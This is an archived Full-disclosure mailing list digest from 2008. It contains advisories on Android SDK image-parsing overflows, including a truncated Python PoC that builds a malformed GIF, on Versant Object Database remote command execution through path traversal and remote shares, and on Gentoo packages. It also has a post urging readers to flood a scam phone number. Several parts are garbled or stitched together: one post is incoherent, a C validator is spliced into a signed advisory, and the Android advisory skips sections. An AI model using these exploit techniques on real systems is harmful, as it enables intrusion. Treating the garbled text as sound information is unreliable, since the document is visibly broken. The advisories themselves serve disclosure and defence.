Message-ID: <6905b1570803040907x1b249006qf610765e6a25f4c6@mail.gmail.com>

cDc's goolag tool is pretty cool but here is an online alternative for
those of you who are interested:

http://www.gnucitizen.org/ghdb/

pdp

--
http://www.gnucitizen.org
http://www.gnucitizen.com
GNUCITIZEN

From advisories at coresecurity.com Tue Mar 4 18:26:56 2008
From: advisories at coresecurity.com (Core Security Technologies Advisories)
Date: Tue, 04 Mar 2008 16:26:56 -0200
Subject: [Full-disclosure] CORE-2008-0124: Multiple vulnerabilities in Google's Android SDK
Message-ID: <47CD9470.9040209@coresecurity.com>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Core Security Technologies - CoreLabs Advisory
http://www.coresecurity.com/corelabs

Multiple vulnerabilities in Google's Android SDK

*Advisory Information*

Title: Multiple vulnerabilities in Google's Android SDK
Advisory ID: CORE-2008-0124
Advisory URL: http://www.coresecurity.com/?action=item&id=2148
Date published: 2008-03-04
Date of last update: 2008-03-04
Vendors contacted: Google
Release mode: Coordinated release

*Vulnerability Information*

Class: Heap overflow, integer overflow
Remotely Exploitable: No
Locally Exploitable: No
Bugtraq ID: 28006, 28005
CVE Name: CVE-2008-0986, CVE-2008-0985, CVE-2006-5793, CVE-2007-2445,
CVE-2007-5267, CVE-2007-5266, CVE-2007-5268, CVE-2007-5269

*Vulnerability Description*

Android is a project promoted primarily by Google through the Open
Handset Alliance aimed at providing a complete set of software for
mobile devices: an operating system, middleware and key mobile
applications [1]. Although the project is currently in a development
phase and has not made an official release yet, several vendors of
mobile chips have unveiled prototype phones built using development
releases of the platform at the Mobile World Congress [2]. Development
using the Android platform gained activity early in 2008 as a result of
Google's launch of the Android Development Challenge which includes $10
million USD in awards [3] for which a Software Development Kit (SDK)
was made available in November 2007.

The Android Software Development Kit includes a fully functional
operating system, a set of core libraries, application development
frameworks, a virtual machine for executing application and a phone
emulator based on the QEMU emulator [4]. Public reports as of February
27th, 2008 state that the Android SDK has been downloaded 750,000 times
since November 2007 [5].

Several vulnerabilities have been found in Android's core libraries for
processing graphic content in some of the most used image formats (PNG,
GIF and BMP). While some of these vulnerabilities stem from the use of
outdated and vulnerable open source image processing libraries others
were introduced by native Android code that use them or that implements
new functionality.

Exploitation of these vulnerabilities to yield complete control of a
phone running the Android platform has been proved possible using the
emulator included in the SDK, which emulates a phone running the
Android platform on an ARM microprocessor.

This advisory contains technical descriptions of these security bugs,
including a proof of concept exploit to run arbitrary code, proving the
possibility of running code on Android stack (over an ARM architecture)
via a binary exploit.

*Vulnerable Packages*

. Android SDK m3-rc37a and earlier are vulnerable to several bugs in
components that process GIF, PNG and BMP images (bugs #1, #2 and #3 of
this advisory).
. Android SDK m5-rc14 is vulnerable to a security bug in the component
that process BMP images (bug #3).

*Non-vulnerable Packages*

. Android SDK m5-rc15

*Vendor Information, Solutions and Workarounds*

Vendor statement:

"The current version of the Android SDK is an early look release to the
open source community, provided so that developers can begin working
with the platform to inform and shape our development of Android toward
production readiness. The Open Handset Alliance welcomes input from the
security community throughout this process. There will be many changes
and updates to the platform before Android is ready for end users,
including a full security review."

*Credits*

These vulnerabilities were discovered by Alfredo Ortega from Core
Security Technologies, leading his Bugweek 2007 team called "Pampa
Grande". It was researched in depth by Alfredo Ortega.

*Technical Description / Proof of Concept Code*

Android is a software stack for mobile devices that includes an
operating system, middleware and key applications. Android relies on
Linux version 2.6 for core system services such as security, memory
management, process management, network stack, and driver model. The
kernel also acts as an abstraction layer between the hardware and the
rest of the software stack.

The WebKit application framework is included to facilitate development
of web client application functionality. The framework in turn uses
different third-party open source libraries to implement processing of
several image formats.

Android includes a web browser based on the Webkit framework that
contains multiple binary vulnerabilities when processing .GIF, .PNG and
.BMP image files, allowing malicious client-side attacks on the web
browser. A client-side attack could be launched from a malicious web
site, hosting specially crafted content, with the possibility of
executing arbitrary code on the victim's Android system.
These client-side binary vulnerabilities were discovered using the
Android SDK that includes an ARM architecture emulator. Binary
vulnerabilities are the most common security bugs in computer software.
Basic bibliography on these vulnerabilities includes a recently updated
handbook about security holes that also describes current
state-of-the-art exploitation techniques for different hardware
platforms and operating systems [6].

The vulnerabilities discovered are summarized below grouped by the type
of image file format that is parsed by the vulnerable component.

#1 - GIF image parsing heap overflow

The Graphics Interchange Format (GIF) is an image format dating at
least from 1989 [7]. It was popularized because GIF images can be
compressed using the Lempel-Ziv-Welch (LZW) compression technique thus
reducing the memory footprint and bandwidth required for transmission
and storage.

A memory corruption condition happens within the GIF processing library
of the WebKit framework when the function 'GIFImageDecoder::onDecode()'
allocates a heap buffer based on the _Logical Screen Width and Height_
field of the GIF header (offsets 6 and 8) and then the resulting buffer
is filled in with an amount of data bytes that is calculated based on
the real Width and Height of the GIF image. There is a similar (if not
the same) bug in the function 'GIFImageDecoder::haveDecodedRow()' in
the open-source version included by Android in
'WebKitLib\WebKit\WebCore\platform\image-decoders\gif\GifImageDecoder.cpp'
inside 'webkit-522-android-m3-rc20.tar.gz' available at [8].

Detailed analysis:

When the process 'com.google.android.browser' must handle content with
a GIF file it loads a dynamic library called 'libsgl.so' which contains
the decoders for multiple image file formats.

Decoding of the GIF image is performed correctly by the library giflib
4.0 (compiled inside 'libsgl.so'). However, the wrapper object
'GIFImageDecoder' miscalculates the total size of the image.
First, the Logical Screen Size is read and stored in the following
calling sequence (As giflib is an Open Source MIT-licenced library, the
source was available for analysis):

'GIFImageDecoder::onDecode()->DGifOpen()->DGifGetScreenDesc()'.

The last function, 'DGifGetScreenDesc()', stores the _Logical Screen
Width and Height_ in a structure called 'GifFileType':

/-----------

int DGifGetScreenDesc(GifFileType * GifFile) {
...
    /* Put the screen descriptor into the file: */
    if (DGifGetWord(GifFile, &GifFile->SWidth) == GIF_ERROR ||
        DGifGetWord(GifFile, &GifFile->SHeight) == GIF_ERROR)
        return GIF_ERROR;
...
}

- -----------/

We can see that the fields are stored in the first 2 words of the
structure:

/-----------

typedef struct GifFileType {
    /* Screen dimensions. */
    GifWord SWidth, SHeight,
...
}

- -----------/

In the disassembly of the GIFImageDecoder::onDecode() function provided
below we can see how the DGifOpen() function is called and that the
return value (A GifFileType struct) is stored on the $R5 ARM register:

/-----------

.text:0002F234 BL _DGifOpen
.text:0002F238 SUBS R5, R0, #0 ; GifFile -_ $R5

- -----------/

Then, the giflib function 'DGifSlurp()' is called and the Image size is
correctly allocated using the Image Width and Height and not the
Logical Screen Size:

/-----------

int DGifSlurp(GifFileType * GifFile) {
...
    ImageSize = sp->ImageDesc.Width * sp->ImageDesc.Height;
    sp->RasterBits = (unsigned char *)malloc(ImageSize * sizeof(GifPixelType));
...
}

- -----------/

Afterwards the _Logical Screen_ Width and Height are stored in the R9
and R11 registers:

/-----------

.text:0002F28C LDMIA R5, {R9,R11} ; R9=SWidth R11=SHeight !

- -----------/

However the actual image may be much larger than these sizes that are
incorrectly passed to a number of methods of the 'GIFImageDecoder':

/-----------

ImageDecoder::chooseFromOneChoice():
.text:0002F294 MOV R0, R8
.text:0002F298 MOV R1, #3
.text:0002F29C MOV R2, R9
.text:0002F2A0 MOV R3, R11
.text:0002F2A4 STR R12, [SP,#0x48+var_3C]
.text:0002F2A8 BL _ImageDecoder19chooseFromOneChoice; ImageDecoder::chooseFromOneChoice(SkBitmap::Config,int ,int)

Bitmap::setConfig():
.text:0002F2B8 MOV R0, R7 ; R7 = SkBitmap
.text:0002F2BC MOV R1, #3
.text:0002F2C0 MOV R2, R9 ; R9=SWidth R11=SHeight !
.text:0002F2C4 MOV R3, R11
.text:0002F2C8 STR R10, [SP,#0x48+var_48]
.text:0002F2CC BL _Bitmap9setConfig ; Bitmap::setConfig(SkBitmap::Config,uint,uint,uint)

- -----------/

This function stores the SWidth and SHeight inside the Bitmap object as
shown in the following code snippet:

/-----------

.text:00035C38 MOV R7, R2 ; $R2 = SWidth, goes to $R7
.text:00035C3C MOV R8, R3 ; $R3 = SHeight, goes to $R8
.text:00035C40 MOV R4, R0 ; $R4 = *Bitmap

- -----------/

And later:

/-----------

.text:00035C58 BL _Bitmap15ComputeRowBytes ; SkBitmap::ComputeRowBytes(SkBitmap::Config,uint)
.text:00035C5C MOV R5, R0 ; $R5 = Real Row Bytes
.text:00035C68 STRH R7, [R4,#0x18] ; *Bitmap+0x18 = SWidth
.text:00035C6C STRH R8, [R4,#0x1A] ; *Bitmap+0x1A = SHeight
.text:00035C60 STRH R5, [R4,#0x1C] ; *Bitmap+0x1C = Row Bytes

- -----------/

The following python script generates a GIF file that causes the
overflow. It requires the Python Imaging Library.
Once the GIF file is generated, it must be opened in the Android
browser to trigger the overflow:

/-----------

##Android Heap Overflow
##Ortega Alfredo _ Core Security Exploit Writers Team
##tested against Android SDK m3-rc37a
import Image
import struct
#Creates a _good_ gif image
imagename='overflow.gif'
str = '\x00\x00\x00\x00'*30000
im = Image.frombuffer('L',(len(str),1),str,'raw','L',0,1)
im.save(imagename,'GIF')
#Shrink the Logical screen dimension
SWidth=1
SHeight=1
img = open(imagename,'rb').read()
img = img[:6]+struct.pack('

- -----------/

Because the exploit needs to fill over 16 MB of heap memory to reach
the address '0xffffff' it is very slow and the default memory
configuration of Android will often abort the process before reaching
the desired point. To overcome this limitation for demonstration
purposes one can launch the emulator with these parameters:

'emulator -qemu -m 192'

That will launch the Android emulator with 192 megabytes of memory,
plenty for the exploit to work.

This security bug affects Android SDK m5-rc14 and earlier versions.

*Report Timeline*

. 2008-01-30: Vendor is notified that possibly exploitable
vulnerabilities were discovered and that an advisory draft is
available. This affects Android SDK m3-rc37a and earlier versions.
. 2008-01-30: Vendor acknowledges and requests the draft.
. 2008-01-31: Core sends the draft encrypted, including PoC code to
generate malformed GIF images.
. 2008-01-31: Vendor acknowledges the draft.
. 2008-02-02: Vendor notifies that the software is an early release for
the open source community, but agree they can fix the problem on the
estimated date (2008-02-25).
. 2008-02-04: Core notifies the vendor that Android is using a
vulnerable PNG processing library.
. 2008-02-08: Vendor acknowledges, invites Core to send any new
findings and asks if all findings will be included in the advisory.
. 2008-02-12: Core responds to vendor that all security issues found
will be included in the advisory, the date is subject to coordination.
. 2008-02-12: Vendor releases version m5-rc14 of the Android SDK. Core
receives no notification.
. 2008-02-13: Core sends the vendor more malformed images, including
GIF, PNG and BMP files. Only the BMP file affects the m5-rc14 release.
. 2008-02-20: Core sends to the vendor a new version of the advisory,
including a BMP PoC that runs arbitrary ARM code and informs the vendor
that we noticed that the recent m5-rc14 release fixed the GIF and PNG
bugs. Publication of CORE-2008-0124 has been re-scheduled for February
27th. 2008.
. 2008-02-21: Vendor confirms that the GIF and PNG fixes have been
released and provides an official statement to the "Vendor Section" of
the advisory. A final review of the advisory is requested before its
release. The vendor indicates that the Android SDK is still in
development and stabilization won't happen until it gets closer to
Alpha. Changes to fix the BMP issue are coming soon, priorities are
given to issues listed in the public issue tracking system at
http://code.google.com/p/android/issues .
. 2008-02-26: Core indicates that publication of CORE-2008-0124 has
been moved to March 3rd 2008, asks if an estimated date for the BMP fix
is available and if Core should file the reported and any future bugs
in the public issue tracking page.
. 2008-02-29: Final draft version of advisory CORE-2008-0124 is sent to
the vendor as requested. Core requests for any additional comments or
statements to be provided by noon March 3rd, 2008 (UTC-5)
. 2008-03-01: Vendor requests publication to be delayed one day in
order to publish a new release of Android with a fix to the BMP issue.
. 2008-03-02: Core agrees to delay publication for one day.
. 2008-03-03: Vendor releases Android SDK m5-rc15 which fixes the BMP
vulnerability.
Vendor indicates that Android applications run with the credentials of
an unprivileged user which decreases the severity of the issues found
. 2008-03-04: Further research by Alfredo Ortega reveals that although
the vendor statement is correct current versions of Android SDK ship
with a passwordless root account. Unprivileged users with shell access
can simply use the 'su' program to gain privileges
. 2008-03-04: Advisory CORE-2008-0124 is published.

*References*

[1] Android Overview - Open Handset Alliance -
http://www.openhandsetalliance.com/android_overview.html
[2] "Android Comes to Life in Barcelona" - The Washington Post,
February 11th, 2008 -
http://www.washingtonpost.com/wp-dyn/content/article/2008/02/11/AR2008021101944.html
[3] Android Developer Challenge -
http://code.google.com/android/adc.html
[4] "Test Center Preview: Inside Google's Mobile future" - InfoWorld,
Feb. 27th 2008 -
http://www.infoworld.com/article/08/02/27/09TC-google-android_1.html
[5] "'Allo, 'allo, Android" - The Sydney Morning Herald, February 26th,
2008 -
http://www.smh.com.au/news/biztech/allo-allo-android/2008/02/26/1203788290737.html
[6] The Shellcoder's Handbook: Discovering and Exploiting Security
Holes by Chris Anley, John Heasman, Felix Lindner and Gerardo Richarte.
Wiley; 2nd edition (August 20, 2007) -
http://www.wiley.com/WileyCDA/WileyTitle/productCd-047008023X.html
[7] Graphics Interchange Format version 89a -
http://www.w3.org/Graphics/GIF/spec-gif89a.txt
[8] Android downloads page -
http://code.google.com/p/android/downloads/list
[9] Portable Network Graphics (PNG) specification -
http://www.w3.org/TR/PNG/
[10] Bitmap File Structures - http://www.digicamsoft.com/bmp/bmp.html

*About CoreLabs*

CoreLabs, the research center of Core Security Technologies, is charged
with anticipating the future needs and requirements for information
security technologies.
We conduct our research in several important areas of computer security
including system vulnerabilities, cyber attack planning and simulation,
source code auditing, and cryptography. Our results include problem
formalization, identification of vulnerabilities, novel solutions and
prototypes for new technologies. CoreLabs regularly publishes security
advisories, technical papers, project information and shared software
tools for public use at: http://www.coresecurity.com/corelabs/.

*About Core Security Technologies*

Core Security Technologies develops strategic solutions that help
security-conscious organizations worldwide develop and maintain a
proactive process for securing their networks. The company's flagship
product, CORE IMPACT, is the most comprehensive product for performing
enterprise security assurance testing. CORE IMPACT evaluates network,
endpoint and end-user vulnerabilities and identifies what resources are
exposed. It enables organizations to determine if current security
investments are detecting and preventing attacks. Core Security
Technologies augments its leading technology solution with world-class
security consulting services, including penetration testing and
software security auditing. Based in Boston, MA and Buenos Aires,
Argentina, Core Security Technologies can be reached at 617-399-6980 or
on the Web at http://www.coresecurity.com.

*Disclaimer*

The contents of this advisory are copyright (c) 2008 Core Security
Technologies and (c) 2008 CoreLabs, and may be distributed freely
provided that no fee is charged for this distribution and proper credit
is given.

*GPG/PGP Keys*

This advisory has been signed with the GPG key of Core Security
Technologies advisories team, which is available for download at
http://www.coresecurity.com/files/attachments/core_security_advisories.asc.
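
The condition behind bug #1 of the advisory above, as an added example (not code from the advisory, giflib, WebKit or Android): a C pre-decode check that walks a GIF's blocks and rejects any frame whose image descriptor extends past the Logical Screen Width and Height. The function, enum and array names are hypothetical, and both sample byte arrays are constructed for this example.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

enum gif_verdict {
    GIF_OK = 0,            /* every frame lies inside the logical screen */
    GIF_FRAME_EXCEEDS = 1, /* a frame is larger than the logical screen  */
    GIF_MALFORMED = -1     /* truncated, no trailer, or not a GIF        */
};

/* GIF stores 16-bit fields little-endian. */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }

/* Size in bytes of a colour table announced by a packed-fields byte. */
static size_t color_table_bytes(uint8_t packed)
{
    return (packed & 0x80) ? (size_t)3 << ((packed & 0x07) + 1) : 0;
}

/* Skip a chain of data sub-blocks: size byte + payload, ended by size 0. */
static int skip_sub_blocks(const uint8_t *buf, size_t len, size_t *pos)
{
    while (*pos < len) {
        size_t n = buf[(*pos)++];
        if (n == 0) return 0;
        if (n > len - *pos) return -1;
        *pos += n;
    }
    return -1;
}

/* Validate frame geometry before any buffer is sized from the header. */
int gif_check_frames(const uint8_t *buf, size_t len)
{
    if (len < 13 || (memcmp(buf, "GIF87a", 6) && memcmp(buf, "GIF89a", 6)))
        return GIF_MALFORMED;
    uint32_t sw = rd16(buf + 6), sh = rd16(buf + 8); /* offsets 6 and 8 */
    size_t pos = 13;
    size_t ct = color_table_bytes(buf[10]);
    if (ct > len - pos) return GIF_MALFORMED;
    pos += ct;

    while (pos < len) {
        uint8_t tag = buf[pos++];
        if (tag == 0x3B)                       /* trailer */
            return GIF_OK;
        if (tag == 0x21) {                     /* extension: label + data */
            if (pos >= len) return GIF_MALFORMED;
            pos++;
            if (skip_sub_blocks(buf, len, &pos)) return GIF_MALFORMED;
        } else if (tag == 0x2C) {              /* image descriptor */
            if (len - pos < 9) return GIF_MALFORMED;
            uint32_t left = rd16(buf + pos), top = rd16(buf + pos + 2);
            uint32_t w = rd16(buf + pos + 4), h = rd16(buf + pos + 6);
            /* The mismatch the advisory describes: real frame size
               larger than the size the output buffer was based on. */
            if (left + w > sw || top + h > sh) return GIF_FRAME_EXCEEDS;
            ct = color_table_bytes(buf[pos + 8]);
            pos += 9;
            if (ct > len - pos) return GIF_MALFORMED;
            pos += ct;
            if (pos >= len) return GIF_MALFORMED;
            pos++;                             /* LZW minimum code size */
            if (skip_sub_blocks(buf, len, &pos)) return GIF_MALFORMED;
        } else {
            return GIF_MALFORMED;
        }
    }
    return GIF_MALFORMED;                      /* ran out before trailer */
}

/* Constructed sample: 1x1 logical screen holding one 1x1 frame. */
static const uint8_t sample_ok[] = {
    'G','I','F','8','9','a',
    0x01,0x00, 0x01,0x00,        /* logical screen 1 x 1            */
    0x00, 0x00, 0x00,            /* no global colour table          */
    0x2C, 0x00,0x00, 0x00,0x00,  /* image descriptor at (0,0)       */
    0x01,0x00, 0x01,0x00, 0x00,  /* frame 1 x 1, no local table     */
    0x02, 0x02,0x4C,0x01, 0x00,  /* LZW code size, one sub-block    */
    0x3B
};

/* Constructed sample: same file, but the frame claims 1024 x 1. */
static const uint8_t sample_bad[] = {
    'G','I','F','8','9','a',
    0x01,0x00, 0x01,0x00,
    0x00, 0x00, 0x00,
    0x2C, 0x00,0x00, 0x00,0x00,
    0x00,0x04, 0x01,0x00, 0x00,  /* frame 1024 x 1 on a 1 x 1 screen */
    0x02, 0x02,0x4C,0x01, 0x00,
    0x3B
};

int main(void)
{
    printf("sample_ok:  %d\n", gif_check_frames(sample_ok, sizeof sample_ok));
    printf("sample_bad: %d\n", gif_check_frames(sample_bad, sizeof sample_bad));
    return 0;
}
```

A decoder wrapper that sizes its bitmap from the logical screen can call a check like this first and refuse the file, or size the bitmap from the larger of the two sets of dimensions.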
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFHzZRwyNibggitWa0RAjbdAJ9YztTFlDK9a3YOxAx5avoXQV5LhgCeMs6I
teV3ahcSAUFEtsaRCeXVuN8=
=u35s
-----END PGP SIGNATURE-----

From stuart at cyberdelix.net Tue Mar 4 19:23:14 2008
From: stuart at cyberdelix.net (lsi)
Date: Tue, 04 Mar 2008 19:23:14 -0000
Subject: [Full-disclosure] lets go vishing
Message-ID: <47CDA1A2.14414.1BA737E@stuart.cyberdelix.net>

[19:15] lsi2lsi: hiya! ... so i was nearly vished today ...
[19:16] lsi2lsi: mobile rings - hello, we're calling from Lloyds TSB, if you are not [name], you must press 2
[19:16] lsi2lsi: if you ARE [name], please press 1
[19:17] lsi2lsi: ..etc.. i went to bank - they'd never heard of such a thing
[19:17] lsi2lsi: fucking scammers
[19:17] lsi2lsi: so its an automated thing - and it's called me 4 times today
[19:17] lsi2lsi: i looked on the net - cant immediately find someone to shut down their 0845 number
[19:18] lsi2lsi: if they call me a few more times, i might go to the cops
[19:18] lsi2lsi: before that tho, i think i'll have some fun with their machine, and post the gory details onto the "full disclosure" list on the net (a security conference, global, unmoderated)
[19:19] lsi2lsi: together with the num, so all my friends and colleagues can enjoy the machine as well
[19:19] lsi2lsi: hopefully they will get hammered by some freak on the list
[19:20] lsi2lsi: fucking scammers!!!
[19:20] lsi2lsi: it's 0845-331-2320 if u want to play :)
[19:20] lsi2lsi: could be lotsa fun .. ;)
[19:21] lsi2lsi: in fact, im gonna post this whole thing to full disclosure right now....

that's +44-845-331-2320 for non-UK folks...
---
Stuart Udall
stuart at at cyberdelix.dot net - http://www.cyberdelix.net/

---
 * Origin: lsi: revolution through evolution (192:168/0.2)

From davidaitel at gmail.com Tue Mar 4 19:47:58 2008
From: davidaitel at gmail.com (Dave Aitel)
Date: Wed, 5 Mar 2008 06:47:58 +1100
Subject: [Full-disclosure] [DailyDave] I like to read
Message-ID: <8cedf8300803041147s4fddf89bj128107f3680fa62f@mail.gmail.com>

[Forwarded from DailyDave]

Tom Clancy just writes about how cool the Catholic religion is. His
latest novel is all about someone trying to talk about format strings
and buffer overflows, you can call them "fish." I've read Dawson's
Creek novels that were better written. Now, telling the public the
truth about RPC is that until you find out you've actually been owned
at least he wrote about sex. Here's me preparing to RPC fuzz Exchange
2003. Does anyone see anything interesting in this industry? In a way,
I think it's funny that there's a new binary, then you're stuck. But
with Windows, even accessing a file or directory was present. Remotely,
with no authentication. This is the secret to open source security.
It's only until their payroll spreadsheets get posted to full
disclosure that they get all outraged and start trying to resolve this
issue for the art, and prevents stupid and harmful things like OIS from
gaining traction. This isn't related to security in any way. Basically
it was at all interesting, but there are people on this list off the
companies.
- -dave

From aluigi at autistici.org Tue Mar 4 20:55:45 2008
From: aluigi at autistici.org (Luigi Auriemma)
Date: Tue, 4 Mar 2008 21:55:45 +0100
Subject: [Full-disclosure] Arbitrary commands execution in Versant Object Database 7.0.1.3
Message-ID: <20080304215545.7d4bce93.aluigi@autistici.org>

#######################################################################

                             Luigi Auriemma

Application:  Versant Object Database
              http://www.versant.com/en_US/products/objectdatabase
Versions:     <= 7.0.1.3
Platforms:    Windows, Solaris, HP-UX, AIX, Linux
Bug:          arbitrary commands execution
Exploitation: remote
Date:         04 Mar 2008
Author:       Luigi Auriemma
              e-mail: aluigi at autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

From vendor's website:
"The Versant Object Database is the market leader in object databases.
Using Versant Object Database for data storage brings powerful
advantages to applications that use complex C++ and Java object models,
have high concurrency requirements, and large data sets. The Versant
Object Database is designed to handle the navigational access, seamless
data distribution, and enterprise scale often required by these
applications."

The Versant server is used also in other stand-alone products like, for
example, Borland CaliberRM which naturally are vulnerable too.

#######################################################################

======
2) Bug
======

VersantD is the service used for managing the Versant database and by
default listens on port 5019 with the subsequent assigning of a new
port after a client connects to it, so the client connects to port 5019
where is handled by the ss.exe process and after the initial exchange
of data the connection continues on the new port.
The first incredible thing which happens when a client connects is that
the full paths which will be used by the server to launch the needed
programs or locate the database files are passed directly by the same
client.

That means for example that if a client passes c:\folder in the
VERSANT_ROOT field, the server will run (in case the "-utility" command
is used) "c:\folder\bin\obe.exe -version 7.0.1 -dbtype + -nettype 2
-arch 11 -utility -soc 220 o_oscp" through the vs_prgExecAsync
function.

Then using a custom command value (at the place of the "-utility" shown
before) beginning with the "..\" pattern for removing the "\bin\"
folder added by the server forces it to execute not only a custom
executable decided by the attacker but also any additional argument
too.

Naturally it is also possible to execute remote commands not available
on the server through, for example, the Windows shares simply using
\\myhost\myfolder as path.

So, resuming, through the Versant server an attacker can execute any
local or remote custom command.

The following is the full command-line executed through a custom
command value (in my proof-of-concept there is the explanation of all
the fields) with the parameters supplied by the client in upper case:

  "VERSANT_ROOT\bin\OUR_COMMAND OUR_ARGUMENTS -noprint -username
  VERSANT_USER -release VERSANT_REL -rootpath VERSANT_ROOT -dbpath
  VERSANT_DB -dbidpath VERSANT_DBID -dbidnode VERSANT_DBID_NODE
  DATABASE_NAME -posterrstk"

It's enough to use a line-feed at the end of our arguments for dropping
all the useless stuff which starts from "-noprint".

Note: all the tests have been performed on the Windows version of the
server so the exploitation could differ a bit on the other supported
platforms.
#######################################################################

===========
3) The Code
===========

http://aluigi.org/poc/versantcmd.zip

#######################################################################

======
4) Fix
======

No fix

#######################################################################

---
Luigi Auriemma
http://aluigi.org

From py at gentoo.org Tue Mar 4 22:38:56 2008
From: py at gentoo.org (Pierre-Yves Rofes)
Date: Tue, 04 Mar 2008 23:38:56 +0100
Subject: [Full-disclosure] [ GLSA 200803-08 ] Win32 binary codecs: Multiple vulnerabilities
Message-ID: <47CDCF80.700@gentoo.org>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Gentoo Linux Security Advisory                           GLSA 200803-08
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
                                            http://security.gentoo.org/
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

  Severity: Normal
     Title: Win32 binary codecs: Multiple vulnerabilities
      Date: March 04, 2008
      Bugs: #150288
        ID: 200803-08

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

Synopsis
========

Multiple vulnerabilities in the Win32 codecs for Linux may result in the remote execution of arbitrary code.

Background
==========

Win32 binary codecs provide support for video and audio playback.

Affected packages
=================

    -------------------------------------------------------------------
     Package                 /   Vulnerable   /             Unaffected
    -------------------------------------------------------------------
  1  media-libs/win32codecs     < 20071007-r2           >= 20071007-r2

Description
===========

Multiple buffer overflow, heap overflow, and integer overflow vulnerabilities were discovered in the Quicktime plugin when processing MOV, FLC, SGI, H.264 and FPX files.

Impact
======

A remote attacker could entice a user to open a specially crafted video file, possibly resulting in the remote execution of arbitrary code with the privileges of the user running the application.

Workaround
==========

There is no known workaround at this time.

Resolution
==========

All Win32 binary codecs users should upgrade to the latest version:

    # emerge --sync
    # emerge --ask --oneshot --verbose ">=media-libs/win32codecs-20071007-r2"

Note: Since no updated binary versions have been released, the Quicktime libraries have been removed from the package. Please use the free alternative Quicktime implementations within VLC, MPlayer or Xine for playback.

References
==========

  [ 1 ] CVE-2006-4382
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4382
  [ 2 ] CVE-2006-4384
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4384
  [ 3 ] CVE-2006-4385
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4385
  [ 4 ] CVE-2006-4386
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4386
  [ 5 ] CVE-2006-4388
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4388
  [ 6 ] CVE-2006-4389
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-4389
  [ 7 ] CVE-2007-4674
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-4674
  [ 8 ] CVE-2007-6166
        http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6166

Availability
============

This GLSA and any updates to it are available for viewing at the Gentoo Security Website:

  http://security.gentoo.org/glsa/glsa-200803-08.xml

Concerns?
=========

Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security at gentoo.org or alternatively, you may file a bug at http://bugs.gentoo.org.

License
=======

Copyright 2008 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.7 (GNU/Linux) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFHzc+AuhJ+ozIKI5gRAkBQAJ45BLSUrSDb21Ro/ZHEimwyzBpqqQCcD15e VpxOGmsa3V34PILWdYXqoXE= =70De -----END PGP SIGNATURE----- From ivanhec at gmail.com Tue Mar 4 21:57:00 2008 From: ivanhec at gmail.com (Ivan .) Date: Wed, 5 Mar 2008 08:57:00 +1100 Subject: [Full-disclosure] Hack into a Windows PC - no password needed Message-ID: <6450e99d0803041357h625c9627m96568e09fbedee20@mail.gmail.com> http://www.smh.com.au/news/security/hack-into-a-windows-pc--no-password-needed/2008/03/04/1204402423638.html From py at gentoo.org Tue Mar 4 23:03:04 2008 From: py at gentoo.org (Pierre-Yves Rofes) Date: Wed, 05 Mar 2008 00:03:04 +0100 Subject: [Full-disclosure] [ GLSA 200803-09 ] Opera: Multiple vulnerabilities Message-ID: <47CDD528.1090907@gentoo.org> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200803-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: Opera: Multiple vulnerabilities Date: March 04, 2008 Bugs: #210260 ID: 200803-09 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been discovered in Opera, allowing for file disclosure, privilege escalation and Cross-Site scripting. Background ========== Opera is a fast web browser that is available free of charge. 
Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 www-client/opera < 9.26 >= 9.26 Description =========== Mozilla discovered that Opera does not handle input to file form fields properly, allowing scripts to manipulate the file path (CVE-2008-1080). Max Leonov found out that image comments might be treated as scripts, and run within the wrong security context (CVE-2008-1081). Arnaud reported that a wrong representation of DOM attribute values of imported XML documents allows them to bypass sanitization filters (CVE-2008-1082). Impact ====== A remote attacker could entice a user to upload a file with a known path by entering text into a specially crafted form, to execute scripts outside intended security boundaries and conduct Cross-Site Scripting attacks. Workaround ========== There is no known workaround at this time. Resolution ========== All Opera users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=www-client/opera-9.26" References ========== [ 1 ] CVE-2008-1080 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1080 [ 2 ] CVE-2008-1081 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1081 [ 3 ] CVE-2008-1082 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-1082 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: 